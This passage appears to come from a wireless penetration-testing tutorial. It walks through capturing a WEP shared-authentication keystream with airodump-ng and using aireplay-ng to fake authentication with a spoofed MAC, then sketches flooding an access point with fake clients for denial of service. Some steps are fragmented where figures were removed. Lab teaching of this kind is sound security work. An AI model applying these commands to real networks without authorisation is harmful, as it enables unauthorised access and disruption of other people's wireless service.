Bypassing Shared Authentication is a bit more challenging than the previous exercises, so follow the steps carefully:
airodump-ng
utility using the airodump-ng mon0 -c 11 --bssid <mac> -w keystream
command. The -w
option, which is new here, requests Airodump-NG to store the packets in a file whose name is prefixed with the word keystream. Incidentally, it might be a good idea to store different sessions of packet captures in different files. This allows you to analyze them long after the trace has been collected:airodump-ng
will capture this exchange automatically by sniffing the air. An indication that the capture has succeeded is when the AUTH
column reads WEP
.keystream file
in the current directory. In my case, the name of the file is keystream-01-00-21-91-D2-8E-25.xor
.aireplay-ng
tool. We run the aireplay-ng -1 0 -e "Wireless Lab" -y keystream-01-00-21-91-D2-8E-25.xor -a <mac> -h AA:AA:AA:AA:AA:AA mon0
command. This aireplay-ng
command uses the keystream we retrieved in step 5 and tries to authenticate with the access point with SSID Wireless Lab and MAC address 00:21:91:D2:8E:25
, and uses an arbitrary client MAC address AA:AA:AA:AA:AA:AA.
Fire up Wireshark and sniff all packets of interest by applying a wlan.addr == AA:AA:AA:AA:AA:AA
filter. We can verify this using Wireshark. You should see a trace on the Wireshark screen, as shown in the following screenshot:aireplay-ng
tool to the access point:aireplay-ng
tool used the derived keystream for encryption, the authentication succeeds and the access point sends a success message in the fourth packet:We were successful in deriving the keystream from a shared authentication exchange, and we used it to fake an authentication to the access point.
Access points have a maximum client count after which they start refusing connections. By writing a simple wrapper over aireplay-ng, it is possible to automate and send hundreds of connection requests from random MAC addresses to the access point. This will end up filling the internal tables and once the maximum client count is reached, the access point will stop accepting new connections. This is typically what is called a Denial of Service (DoS) attack and can force the router to reboot or make it dysfunctional. This can lead to all the wireless clients being disconnected and being unable to use the authorized network.
Check whether you can verify this in your lab!
Q1. How can you force a wireless client to re-connect to the access point?
Q2. What does Open Authentication do?
Q3. How does breaking Shared Key Authentication work?